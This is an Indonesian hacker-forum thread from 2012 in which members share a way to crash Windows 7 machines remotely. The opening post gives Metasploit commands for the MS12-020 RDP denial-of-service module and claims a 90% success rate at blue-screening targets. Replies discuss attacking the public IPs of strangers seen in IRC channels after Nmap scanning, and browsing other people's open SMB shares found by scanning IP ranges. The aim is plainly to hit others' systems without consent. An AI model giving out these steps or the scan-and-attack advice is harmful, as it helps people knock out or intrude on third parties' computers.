DOS Win 7
wah...
belum nemu nih om yang port begituan.. jagi gagal terus...
ciyus Big Grin
tapii ane coba yak..
thanks for you ..
Quote:~ Tan Hana Wighna Tan Sirna ~

nahh kalo port 3389 tertutup gmna cara bukanya secara paksa pak?
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

Om wine trochanter & gnome_selpa,,, Yup jarang sekali target yang buka port itu,,,, tapi ada cara lain di thread ane yang lain untuk membuat win 7 bluescreen,,, Big Grin di search aja..

(11-09-2012, 02:15 PM)xnod_die Wrote: Om wine trochanter & gnome_selpa,,, Yup jarang sekali target yang buka port itu,,,, tapi ada cara lain di thread ane yang lain untuk membuat win 7 bluescreen,,, Big Grin di search aja..

yang pake share itu kan om...
melalui port 445...
sekarang kita bisa tau bahwa si target share datanya gimana...
Quote:~ Tan Hana Wighna Tan Sirna ~

(11-09-2012, 02:15 PM)xnod_die Wrote: Om wine trochanter & gnome_selpa,,, Yup jarang sekali target yang buka port itu,,,, tapi ada cara lain di thread ane yang lain untuk membuat win 7 bluescreen,,, Big Grin di search aja..

yg port 445 pak?
klo di xp bisa di win7 ehheh blum berhasil sampai skrngSad(
ada kodok teroret teroret dipinggir kali terorret teroret mencari makan teroret teroret setiap pagi teroret teroret

visit: http://warungiso.blogspot.com/

I was not smart or special but I was unix

klo cara ane sh,, OS inti ane pake windows.... klo backtrack hanya sekedar dari VMware... caranya ya cari nya lewat windows... scan range IP dlu,,, cari yg aktif.. trus buka RUN -> \\192.168.1.5 (misalkan) cari yg kebuka share doc nya... cara manual kyak gtu om,,, Big Grin

[Image: 1.png]

serangan bertubi2 hingga down

thanks sob sharing lagi ya

(11-06-2012, 10:05 PM)xnod_die Wrote: Yup mas brow..... msih ane test dalam 1 jaringan,,, tapi ane blum nyoba ke IP public yang servernya windows 2008 dll... ntar klo dah bisa baru ane post lagi,,, Smile

gini om,
ane kan sering maen di IRC Freenote,
jdi bgitu kita masuk atau kluar Room,
IP kita tercatat

pertanyaan ini,
bisa gak kita serang tuh IP Public ?
Klik Here

Clound@IBTeam:~#
EMail Me : [email protected]

(11-11-2012, 09:55 PM)Clound_Cyber4rt Wrote:
(11-06-2012, 10:05 PM)xnod_die Wrote: Yup mas brow..... msih ane test dalam 1 jaringan,,, tapi ane blum nyoba ke IP public yang servernya windows 2008 dll... ntar klo dah bisa baru ane post lagi,,, Smile

gini om,
ane kan sering maen di IRC Freenote,
jdi bgitu kita masuk atau kluar Room,
IP kita tercatat

pertanyaan ini,
bisa gak kita serang tuh IP Public ?

ane sh blum pnah Maen IRC freenote dsb,, tp pada intinya ip publick pasti bisa diserang,,, coba di Nmap dlu klo ada port yang memungkinkan kita serang pasti bisa2 aja,, Big Grin

(11-06-2012, 09:47 PM)xnod_die Wrote: Okay kawan2 di IBT,, mungkin ane post thread yang biasa2 aja mungkin juga ane repost ulang,,,
sambil berguru ma founder2 IBT di wahana lain,,,
langsung aja,,, kita praktek membuat serangan DOS ke windows 7 dengan metode RDP
Intinya target lawan port (3389) nya harus aktif..

msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf> set RHOST [target IP]
msf> exploit

~~~~~~~~~~~~~~~~~~~~~~~
Ane dah coba ke beberapa laptop yang OS nya windows 7
dan hasilnya target akan langsung BLUE SCREEN hanya dengan sekali serangan,,,,, tapi tergantung jika hardware nya masih oke,,, kita butuh 2x serangan atau lebih....

note: maaf gak ada video nya,, tapi ane jamin 90% berhasil membuat target down,,, Confused

Regards

xnod_die

tutorial yang lebih lengkap nya gmn nee om...
step by step.
root@punisher404:~# sudo IBT-Sumbar Crew